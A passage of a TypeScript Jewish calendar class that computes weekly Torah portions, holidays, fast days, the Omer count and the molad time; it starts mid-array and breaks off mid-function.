[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS, Parsha.MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
];
/**
* Is this calendar set to return modern Israeli national holidays. By default this value is false. The holidays
* are: "<NAME>", "<NAME>", "<NAME>" and "Y<NAME>"
*
* @return the useModernHolidays true if set to return modern Israeli national holidays
*/
public isUseModernHolidays(): boolean {
return this.useModernHolidays;
}
/**
* Seth the calendar to return modern Israeli national holidays. By default this value is false. The holidays are:
* "Yom HaShoah", "Y<NAME>", "Y<NAME>'atzmaut" and "<NAME>"
*
* @param useModernHolidays
* the useModernHolidays to set
*/
public setUseModernHolidays(useModernHolidays: boolean): void {
this.useModernHolidays = useModernHolidays;
}
/**
* Default constructor will set a default date to the current system date.
*/
/*
public JewishCalendar() {
super();
}
*/
/**
* A constructor that initializes the date to the {@link java.util.Date Date} parameter.
*
* @param date
* the <code>Date</code> to set the calendar to
*/
/*
public JewishCalendar(date: Date) {
super(date);
}
*/
/**
* A constructor that initializes the date to the {@link java.util.Calendar Calendar} parameter.
*
* @param calendar
* the <code>Calendar</code> to set the calendar to
*/
/*
public JewishCalendar(calendar: GregorianCalendar) {
super(calendar);
}
*/
/**
* Creates a Jewish date based on a Jewish year, month and day of month.
*
* @param jewishYear
* the Jewish year
* @param jewishMonth
* the Jewish month. The method expects a 1 for Nissan ... 12 for Adar and 13 for Adar II. Use the
* constants {@link #NISSAN} ... {@link #ADAR} (or {@link #ADAR_II} for a leap year Adar II) to avoid any
* confusion.
* @param jewishDayOfMonth
* the Jewish day of month. If 30 is passed in for a month with only 29 days (for example {@link #IYAR},
* or {@link #KISLEV} in a year that {@link #isKislevShort()}), the 29th (last valid date of the month)
* will be set
* @throws IllegalArgumentException
* if the day of month is < 1 or > 30, or a year of < 0 is passed in.
*/
/*
public JewishCalendar(jewishYear: number, jewishMonth: number, jewishDayOfMonth: number) {
super(jewishYear, jewishMonth, jewishDayOfMonth);
}
*/
/**
* Creates a Jewish date based on a Jewish date and whether in Israel
*
* @param jewishYear
* the Jewish year
* @param jewishMonth
* the Jewish month. The method expects a 1 for Nissan ... 12 for Adar and 13 for Adar II. Use the
* constants {@link #NISSAN} ... {@link #ADAR} (or {@link #ADAR_II} for a leap year Adar II) to avoid any
* confusion.
* @param jewishDayOfMonth
* the Jewish day of month. If 30 is passed in for a month with only 29 days (for example {@link #IYAR},
* or {@link #KISLEV} in a year that {@link #isKislevShort()}), the 29th (last valid date of the month)
* will be set
* @param inIsrael
* whether in Israel. This affects Yom Tov calculations
*/
constructor(jewishYear: number, jewishMonth: number, jewishDayOfMonth: number, inIsrael?: boolean)
constructor(date: Date)
constructor(date: DateTime)
constructor()
constructor(jewishYearOrDateTimeOrDate?: number | Date | DateTime, jewishMonth?: number, jewishDayOfMonth?: number, inIsrael?: boolean) {
// @ts-ignore
super(jewishYearOrDateTimeOrDate, jewishMonth, jewishDayOfMonth);
if (inIsrael) this.setInIsrael(inIsrael);
}
/**
* Sets whether to use Israel holiday scheme or not. Default is false.
*
* @param inIsrael
* set to true for calculations for Israel
*/
public setInIsrael(inIsrael: boolean): void {
this.inIsrael = inIsrael;
}
/**
* Gets whether Israel holiday scheme is used or not. The default (if not set) is false.
*
* @return if the if the calendar is set to Israel
*/
public getInIsrael(): boolean {
return this.inIsrael;
}
/**
* <a href="https://en.wikipedia.org/wiki/Birkat_Hachama">Birkas Hachamah</a> is recited every 28 years based on
* Tekufas Shmulel (Julian years) that a year is 365.25 days. The <a href="https://en.wikipedia.org/wiki/Maimonides">Rambam</a>
* in <a href="http://hebrewbooks.org/pdfpager.aspx?req=14278&st=&pgnum=323">Hilchos Kiddush Hachodesh 9:3</a> states that
* tekufas Nisan of year 1 was 7 days + 9 hours before molad Nisan. This is calculated as every 10,227 days (28 * 365.25).
* @return true for a day that Birkas Hachamah is recited.
*/
public isBirkasHachamah(): boolean {
// elapsed days since molad ToHu
let elapsedDays: number = JewishCalendar.getJewishCalendarElapsedDays(this.getJewishYear());
// elapsed days to the current calendar date
elapsedDays += this.getDaysSinceStartOfJewishYear();
/* Molad Nisan year 1 was 177 days after molad tohu of Tishrei. We multiply 29.5 day months * 6 months from Tishrei
* to Nisan = 177. Subtract 7 days since tekufas Nisan was 7 days and 9 hours before the molad as stated in the Rambam
* and we are now at 170 days. Because getJewishCalendarElapsedDays and getDaysSinceStartOfJewishYear use the value for
* Rosh Hashana as 1, we have to add 1 day days for a total of 171. To this add a day since the tekufah is on a Tuesday
* night and we push off the bracha to Wednesday AM resulting in the 172 used in the calculation.
*/
// 28 years of 365.25 days + the offset from molad tohu mentioned above
return elapsedDays % (28 * 365.25) === 172;
}
/**
* Return the type of year for parsha calculations. The algorithm follows the
* <a href="http://hebrewbooks.org/pdfpager.aspx?req=14268&st=&pgnum=222"><NAME></a> in the Tur Ohr Hachaim.
* @return the type of year for parsha calculations.
* @todo Use constants in this class.
*/
private getParshaYearType(): number {
// plus one to the original <NAME>ana of year 1 to get a week starting on Sunday
let roshHashanaDayOfWeek: number = (JewishCalendar.getJewishCalendarElapsedDays(this.getJewishYear()) + 1) % 7;
if (roshHashanaDayOfWeek === 0) {
// convert 0 to 7 for Shabbos for readability
roshHashanaDayOfWeek = SATURDAY;
}
if (this.isJewishLeapYear()) {
// eslint-disable-next-line default-case
switch (roshHashanaDayOfWeek) {
case MONDAY:
// BaCh
if (this.isKislevShort()) {
if (this.getInIsrael()) {
return 14;
}
return 6;
}
// BaSh
if (this.isCheshvanLong()) {
if (this.getInIsrael()) {
return 15;
}
return 7;
}
break;
// GaK
case TUESDAY:
if (this.getInIsrael()) {
return 15;
}
return 7;
case THURSDAY:
// HaCh
if (this.isKislevShort()) {
return 8;
}
// HaSh
if (this.isCheshvanLong()) {
return 9;
}
break;
case SATURDAY:
// ZaCh
if (this.isKislevShort()) {
return 10;
}
// ZaSh
if (this.isCheshvanLong()) {
if (this.getInIsrael()) {
return 16;
}
return 11;
}
break;
}
} else {
// not a leap year
// eslint-disable-next-line default-case
switch (roshHashanaDayOfWeek) {
case MONDAY:
// BaCh
if (this.isKislevShort()) {
return 0;
}
// BaSh
if (this.isCheshvanLong()) {
if (this.getInIsrael()) {
return 12;
}
return 1;
}
break;
case TUESDAY:
// GaK
if (this.getInIsrael()) {
return 12;
}
return 1;
case THURSDAY:
// HaSh
if (this.isCheshvanLong()) {
return 3;
}
// HaK
if (!this.isKislevShort()) {
if (this.getInIsrael()) {
return 13;
}
return 2;
}
break;
case SATURDAY:
// ZaCh
if (this.isKislevShort()) {
return 4;
}
// ZaSh
if (this.isCheshvanLong()) {
return 5;
}
break;
}
}
// keep the compiler happy
return -1;
}
/**
* Returns this week's {@link Parsha} if it is Shabbos.
* returns Parsha.NONE if a weekday or if there is no parsha that week (for example Yomtov is on Shabbos)
* @return the current parsha
*/
public getParsha(): Parsha {
if (this.getDayOfWeek() !== SATURDAY) {
return Parsha.NONE;
}
const yearType: number = this.getParshaYearType();
const roshHashanaDayOfWeek: number = JewishCalendar.getJewishCalendarElapsedDays(this.getJewishYear()) % 7;
const day: number = roshHashanaDayOfWeek + this.getDaysSinceStartOfJewishYear();
// negative year should be impossible, but lets cover all bases
if (yearType >= 0) {
return JewishCalendar.parshalist[yearType][day / 7];
}
// keep the compiler happy
return Parsha.NONE;
}
/**
* Returns a parsha enum if the Shabbos is one of the four parshiyos of Parsha.SHKALIM, Parsha.ZACHOR, Parsha.PARA,
* Parsha.HACHODESH or Parsha.NONE for a regular Shabbos (or any weekday).
* @return one of the four parshiyos of Parsha.SHKALIM, Parsha.ZACHOR, Parsha.PARA, Parsha.HACHODESH or Parsha.NONE.
*/
public getSpecialShabbos(): Parsha {
if (this.getDayOfWeek() === SATURDAY) {
if (((this.getJewishMonth() === JewishCalendar.SHEVAT && !this.isJewishLeapYear()) ||
(this.getJewishMonth() === JewishCalendar.ADAR && this.isJewishLeapYear())) &&
[25, 27, 29].includes(this.getJewishDayOfMonth())) {
return Parsha.SHKALIM;
}
if ((this.getJewishMonth() === JewishCalendar.ADAR && !this.isJewishLeapYear()) ||
this.getJewishMonth() === JewishCalendar.ADAR_II) {
if (this.getJewishDayOfMonth() === 1) {
return Parsha.SHKALIM;
}
if ([8, 9, 11, 13].includes(this.getJewishDayOfMonth())) {
return Parsha.ZACHOR;
}
if ([18, 20, 22, 23].includes(this.getJewishDayOfMonth())) {
return Parsha.PARA;
}
if ([25, 27, 29].includes(this.getJewishDayOfMonth())) {
return Parsha.HACHODESH;
}
}
if (this.getJewishMonth() === JewishCalendar.NISSAN && this.getJewishDayOfMonth() === 1) {
return Parsha.HACHODESH;
}
}
return Parsha.NONE;
}
/**
* Returns an index of the Jewish holiday or fast day for the current day, or a null if there is no holiday for this
* day.
*
* @return A String containing the holiday name or an empty string if it is not a holiday.
*/
public getYomTovIndex(): number {
const day: number = this.getJewishDayOfMonth();
const dayOfWeek: number = this.getDayOfWeek();
// check by month (starts from Nissan)
// eslint-disable-next-line default-case
switch (this.getJewishMonth()) {
case JewishCalendar.NISSAN:
if (day === 14) {
return JewishCalendar.EREV_PESACH;
} else if (day === 15 || day === 21 || (!this.inIsrael && (day === 16 || day === 22))) {
return JewishCalendar.PESACH;
} else if ((day >= 17 && day <= 20) || (day === 16 && this.inIsrael)) {
return JewishCalendar.CHOL_HAMOED_PESACH;
}
if (this.isUseModernHolidays() &&
((day === 26 && dayOfWeek === 5) || (day === 28 && dayOfWeek === 2) ||
(day === 27 && dayOfWeek !== 1 && dayOfWeek !== 6))) {
return JewishCalendar.YOM_HASHOAH;
}
break;
case JewishCalendar.IYAR:
if (this.isUseModernHolidays() &&
((day === 4 && dayOfWeek === 3) || ((day === 3 || day === 2) && dayOfWeek === 4) ||
(day === 5 && dayOfWeek === 2))) {
return JewishCalendar.YOM_HAZIKARON;
}
// if 5 Iyar falls on Wed Yom Haatzmaut is that day. If it fal1s on Friday or Shabbos it is moved back to
// Thursday. If it falls on Monday it is moved to Tuesday
if (this.isUseModernHolidays() && ((day === 5 && dayOfWeek === 4) ||
((day === 4 || day === 3) && dayOfWeek === 5) || (day === 6 && dayOfWeek === 3))) {
return JewishCalendar.YOM_HAATZMAUT;
}
if (day === 14) {
return JewishCalendar.PESACH_SHENI;
}
if (this.isUseModernHolidays() && day === 28) {
return JewishCalendar.YOM_YERUSHALAYIM;
}
break;
case JewishCalendar.SIVAN:
if (day === 5) {
return JewishCalendar.EREV_SHAVUOS;
} else if (day === 6 || (day === 7 && !this.inIsrael)) {
return JewishCalendar.SHAVUOS;
}
break;
case JewishCalendar.TAMMUZ:
// push off the fast day if it falls on Shabbos
if ((day === 17 && dayOfWeek !== 7) || (day === 18 && dayOfWeek === 1)) {
return JewishCalendar.SEVENTEEN_OF_TAMMUZ;
}
break;
case JewishCalendar.AV:
// if Tisha B'av falls on Shabbos, push off until Sunday
if ((dayOfWeek === 1 && day === 10) || (dayOfWeek !== 7 && day === 9)) {
return JewishCalendar.TISHA_BEAV;
} else if (day === 15) {
return JewishCalendar.TU_BEAV;
}
break;
case JewishCalendar.ELUL:
if (day === 29) {
return JewishCalendar.EREV_ROSH_HASHANA;
}
break;
case JewishCalendar.TISHREI:
if (day === 1 || day === 2) {
return JewishCalendar.ROSH_HASHANA;
} else if ((day === 3 && dayOfWeek !== 7) || (day === 4 && dayOfWeek === 1)) {
// push off Tzom Gedalia if it falls on Shabbos
return JewishCalendar.FAST_OF_GEDALYAH;
} else if (day === 9) {
return JewishCalendar.EREV_YOM_KIPPUR;
} else if (day === 10) {
return JewishCalendar.YOM_KIPPUR;
} else if (day === 14) {
return JewishCalendar.EREV_SUCCOS;
}
if (day === 15 || (day === 16 && !this.inIsrael)) {
return JewishCalendar.SUCCOS;
}
if ((day >= 17 && day <= 20) || (day === 16 && this.inIsrael)) {
return JewishCalendar.CHOL_HAMOED_SUCCOS;
}
if (day === 21) {
return JewishCalendar.HOSHANA_RABBA;
}
if (day === 22) {
return JewishCalendar.SHEMINI_ATZERES;
}
if (day === 23 && !this.inIsrael) {
return JewishCalendar.SIMCHAS_TORAH;
}
break;
case JewishCalendar.KISLEV: // no yomtov in CHESHVAN
// if (day == 24) {
// return EREV_CHANUKAH;
// } else
if (day >= 25) {
return JewishCalendar.CHANUKAH;
}
break;
case JewishCalendar.TEVES:
if (day === 1 || day === 2 || (day === 3 && this.isKislevShort())) {
return JewishCalendar.CHANUKAH;
} else if (day === 10) {
return JewishCalendar.TENTH_OF_TEVES;
}
break;
case JewishCalendar.SHEVAT:
if (day === 15) {
return JewishCalendar.TU_BESHVAT;
}
break;
case JewishCalendar.ADAR:
if (!this.isJewishLeapYear()) {
// if 13th Adar falls on Friday or Shabbos, push back to Thursday
if (((day === 11 || day === 12) && dayOfWeek === 5) || (day === 13 && !(dayOfWeek === 6 || dayOfWeek === 7))) {
return JewishCalendar.FAST_OF_ESTHER;
}
if (day === 14) {
return JewishCalendar.PURIM;
} else if (day === 15) {
return JewishCalendar.SHUSHAN_PURIM;
}
} else if (day === 14) {
// else if a leap year
return JewishCalendar.PURIM_KATAN;
}
break;
case JewishCalendar.ADAR_II:
// if 13th Adar falls on Friday or Shabbos, push back to Thursday
if (((day === 11 || day === 12) && dayOfWeek === 5) || (day === 13 && !(dayOfWeek === 6 || dayOfWeek === 7))) {
return JewishCalendar.FAST_OF_ESTHER;
}
if (day === 14) {
return JewishCalendar.PURIM;
} else if (day === 15) {
return JewishCalendar.SHUSHAN_PURIM;
}
break;
}
// if we get to this stage, then there are no holidays for the given date return -1
return -1;
}
/**
* Returns true if the current day is Yom Tov. The method returns false for Chanukah, Erev Yom Tov (with the
* exception of <NAME> and Erev the second days of Pesach) and fast days.
*
* @return true if the current day is a Yom Tov
* @see #isErevYomTov()
* @see #isErevYomTovSheni()
* @see #isTaanis()
*/
public isYomTov(): boolean {
const holidayIndex: number = this.getYomTovIndex();
if ((this.isErevYomTov() && (holidayIndex !== JewishCalendar.HOSHANA_RABBA &&
(holidayIndex === JewishCalendar.CHOL_HAMOED_PESACH && this.getJewishDayOfMonth() !== 20))) ||
holidayIndex === JewishCalendar.CHANUKAH || (this.isTaanis() && holidayIndex !== JewishCalendar.YOM_KIPPUR)) {
return false;
}
return this.getYomTovIndex() !== -1;
}
/**
* Returns true if the <em>Yom Tov</em> day has a <em>melacha</em> (work) prohibition. This method will return false for a
* non-<em>Yom Tov</em> day, even if it is <em>Shabbos</em>.
*
* @return if the <em>Yom Tov</em> day has a <em>melacha</em> (work) prohibition.
*/
public isYomTovAssurBemelacha(): boolean {
const yamimTovimAssurBemelacha = [
JewishCalendar.PESACH,
JewishCalendar.SHAVUOS,
JewishCalendar.SUCCOS,
JewishCalendar.SHEMINI_ATZERES,
JewishCalendar.SIMCHAS_TORAH,
JewishCalendar.ROSH_HASHANA,
JewishCalendar.YOM_KIPPUR,
];
const holidayIndex: number = this.getYomTovIndex();
return yamimTovimAssurBemelacha.includes(holidayIndex);
}
/**
* Returns true if it is <em>Shabbos</em> or if it is a <em>Yom Tov</em> day that has a <em>melacha</em> (work) prohibition.
* This method will return false for a.
* @return if the day is a <em>Yom Tov</em> that is <em>assur bemlacha</em> or <em>Shabbos</em>
*/
public isAssurBemelacha(): boolean {
return this.getDayOfWeek() === SATURDAY || this.isYomTovAssurBemelacha();
}
/**
* Returns true if the day has candle lighting. This will return true on erev <em>Shabbos</em>, erev <em>Yom Tov</em>, the
* first day of <em><NAME></em> and the first days of <em>Yom Tov</em> out of Israel. It is identical
* to calling {@link #isTomorrowShabbosOrYomTov()}.
*
* @return if the day has candle lighting
*/
public hasCandleLighting(): boolean {
return this.isTomorrowShabbosOrYomTov();
}
/**
* Returns true if tomorrow is <em>Shabbos</em> or <em>Yom Tov</em>. This will return true on erev <em>Shabbos</em>, erev
* <em>Yom Tov</em>, the first day of <em><NAME>ana</em> and <em>erev</em> the first days of <em>Yom Tov</em> out of
* Israel. It is identical to calling {@link #hasCandleLighting()}.
* @return will return if the next day is <em>Shabbos</em> or <em>Yom Tov</em>
*/
public isTomorrowShabbosOrYomTov(): boolean {
return this.getDayOfWeek() === FRIDAY || this.isErevYomTov() || this.isErevYomTovSheni();
}
/**
* Returns true if the day is the second day of <em>Yom Tov</em>. This impacts the second day of <em><NAME>ana</em>
* everywhere, and the second days of Yom Tov in <em>chutz laaretz</em> (out of Israel).
*
* @return if the day is the second day of <em>Yom Tov</em>.
*/
public isErevYomTovSheni(): boolean {
return (this.getJewishMonth() === JewishCalendar.TISHREI && (this.getJewishDayOfMonth() === 1)) ||
(!this.getInIsrael() &&
((this.getJewishMonth() === JewishCalendar.NISSAN && [15, 21].includes(this.getJewishDayOfMonth())) ||
(this.getJewishMonth() === JewishCalendar.TISHREI && [15, 22].includes(this.getJewishDayOfMonth())) ||
(this.getJewishMonth() === JewishCalendar.SIVAN && this.getJewishDayOfMonth() === 6)));
}
/**
* Returns true if the current day is <em>Aseret Yemei Teshuva</em>.
*
* @return if the current day is <em>Aseret Yemei Teshuvah</em>
*/
public isAseresYemeiTeshuva(): boolean {
return this.getJewishMonth() === JewishCalendar.TISHREI && this.getJewishDayOfMonth() <= 10;
}
/**
* Returns true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em> or <em>Succos</em>.
*
* @return true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em> or <em>Succos</em>
* @see #isYomTov()
* @see #CHOL_HAMOED_PESACH
* @see #CHOL_HAMOED_SUCCOS
*/
public isCholHamoed(): boolean {
return this.isCholHamoedPesach() || this.isCholHamoedSuccos();
}
/**
* Returns true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em>.
*
* @return true if the current day is <em>Chol Hamoed</em> of <em>Pesach</em>
* @see #isYomTov()
* @see #CHOL_HAMOED_PESACH
*/
public isCholHamoedPesach(): boolean {
const holidayIndex: number = this.getYomTovIndex();
return holidayIndex === JewishCalendar.CHOL_HAMOED_PESACH;
}
/**
* Returns true if the current day is <em>Chol Hamoed</em> of <em>Succos</em>.
*
* @return true if the current day is <em>Chol Hamoed</em> of <em>Succos</em>
* @see #isYomTov()
* @see #CHOL_HAMOED_SUCCOS
*/
public isCholHamoedSuccos(): boolean {
const holidayIndex: number = this.getYomTovIndex();
return holidayIndex === JewishCalendar.CHOL_HAMOED_SUCCOS;
}
/**
* Returns true if the current day is erev Yom Tov. The method returns true for Erev - Pesach (first and last days),
* Shavuos, <NAME>, <NAME> and Succos and <NAME>.
*
* @return true if the current day is Erev - Pesach, Shavuos, <NAME>, <NAME> and Succos
* @see #isYomTov()
* @see #isErevYomTovSheni()
*/
public isErevYomTov(): boolean {
const erevYomTov = [
JewishCalendar.EREV_PESACH,
JewishCalendar.EREV_SHAVUOS,
JewishCalendar.EREV_ROSH_HASHANA,
JewishCalendar.EREV_YOM_KIPPUR,
JewishCalendar.EREV_SUCCOS,
JewishCalendar.HOSHANA_RABBA,
];
const holidayIndex: number = this.getYomTovIndex();
return erevYomTov.includes(holidayIndex) ||
(holidayIndex === JewishCalendar.CHOL_HAMOED_PESACH && this.getJewishDayOfMonth() === 20);
}
/**
* Returns true if the current day is <NAME>. Returns false for <NAME>
*
* @return true if the current day is <NAME>. Returns false for <NAME>
* @see #isRoshChodesh()
*/
public isErevRoshChodesh(): boolean {
// <NAME> is not <NAME>.
return (this.getJewishDayOfMonth() === 29 && this.getJewishMonth() !== JewishCalendar.ELUL);
}
/**
* Return true if the day is a Taanis (fast day). Return true for 17 of Tammuz, <NAME>, <NAME>, Fast of
* Gedalyah, 10 of Teves and the Fast of Esther
*
* @return true if today is a fast day
*/
public isTaanis(): boolean {
const taaniyos = [
JewishCalendar.SEVENTEEN_OF_TAMMUZ,
JewishCalendar.TISHA_BEAV,
JewishCalendar.YOM_KIPPUR,
JewishCalendar.FAST_OF_GEDALYAH,
JewishCalendar.TENTH_OF_TEVES,
JewishCalendar.FAST_OF_ESTHER,
];
const holidayIndex: number = this.getYomTovIndex();
return taaniyos.includes(holidayIndex);
}
/**
* Returns the day of Chanukah or -1 if it is not Chanukah.
*
* @return the day of Chanukah or -1 if it is not Chanukah.
*/
public getDayOfChanukah(): number {
const day: number = this.getJewishDayOfMonth();
if (this.isChanukah()) {
if (this.getJewishMonth() === JewishCalendar.KISLEV) {
return day - 24;
}
// teves
return this.isKislevShort() ? day + 5 : day + 6;
}
return -1;
}
public isChanukah(): boolean {
return this.getYomTovIndex() === JewishCalendar.CHANUKAH;
}
/**
* Returns if the day is <NAME>. <NAME> will return false
*
* @return true if it is Rosh Chodesh. <NAME> will return false
*/
public isRoshChodesh(): boolean {
// <NAME>ana is not rosh chodesh. Elul never has 30 days
return (this.getJewishDayOfMonth() === 1 && this.getJewishMonth() !== JewishCalendar.TISHREI) || this.getJewishDayOfMonth() === 30;
}
/**
* Returns if the day is Shabbos and sunday is Rosh Chodesh.
*
* @return true if it is Shabbos and sunday is Rosh Chodesh.
*/
public isMacharChodesh(): boolean {
return (this.getDayOfWeek() === SATURDAY && (this.getJewishDayOfMonth() === 30 || this.getJewishDayOfMonth() === 29));
}
/**
* Returns if the day is Shabbos Mevorchim.
*
* @return true if it is Shabbos Mevorchim.
*/
public isShabbosMevorchim(): boolean {
return (this.getDayOfWeek() === SATURDAY && this.getJewishDayOfMonth() >= 23 && this.getJewishDayOfMonth() <= 29);
}
/**
* Returns the int value of the Omer day or -1 if the day is not in the omer
*
* @return The Omer count as an int or -1 if it is not a day of the Omer.
*/
public getDayOfOmer(): number {
let omer: number = -1; // not a day of the Omer
const month: number = this.getJewishMonth();
const day: number = this.getJewishDayOfMonth();
// if Nissan and second day of Pesach and on
if (month === JewishCalendar.NISSAN && day >= 16) {
omer = day - 15;
// if Iyar
} else if (month === JewishCalendar.IYAR) {
omer = day + 15;
// if Sivan and before Shavuos
} else if (month === JewishCalendar.SIVAN && day < 6) {
omer = day + 44;
}
return omer;
}
/**
* Returns the molad in Standard Time in Yerushalayim as a Date. The traditional calculation uses local time. This
* method subtracts 20.94 minutes (20 minutes and 56.496 seconds) from the local time (Har Habayis with a longitude
* of 35.2354° is 5.2354° away from the %15 timezone longitude) to get to standard time. This method
* intentionally uses standard time and not dailight savings time. Java will implicitly format the time to the
* default (or set) Timezone.
*
* @return the Date representing the moment of the molad in Yerushalayim standard time (GMT + 2)
*/
public getMoladAsDate(): DateTime {
const molad: JewishDate = this.getMolad();
const locationName: string = 'Jerusalem, Israel';
const latitude: number = 31.778; // Har Habayis latitude
const longitude: number = 35.2354; // Har Habayis longitude
// The molad calculation always expects output in standard time. Using "Asia/Jerusalem" timezone will incorrect
// adjust for DST.
const yerushalayimStandardTZ: string = 'Etc/GMT+2';
const geo: GeoLocation = new GeoLocation(locationName, latitude, longitude, yerushalayimStandardTZ);
const moladSeconds: number = (molad.getMoladChalakim() * 10) / 3;
// subtract local time difference of 20.94 minutes (20 minutes and 56.496 seconds) to get to Standard time
const milliseconds: number = Math.trunc(1000 * (moladSeconds - Math.trunc(moladSeconds)));
return DateTime.fromObject({
year: molad.getGregorianYear(),
month: molad.getGregorianMonth() + 1,
day: molad.getGregorianDayOfMonth(),
hour: molad.getMoladHours(),
minute: molad.getMoladMinutes(),
second: Math.trunc(moladSeconds),
millisecond: milliseconds,
zone: geo.getTimeZone(),
})
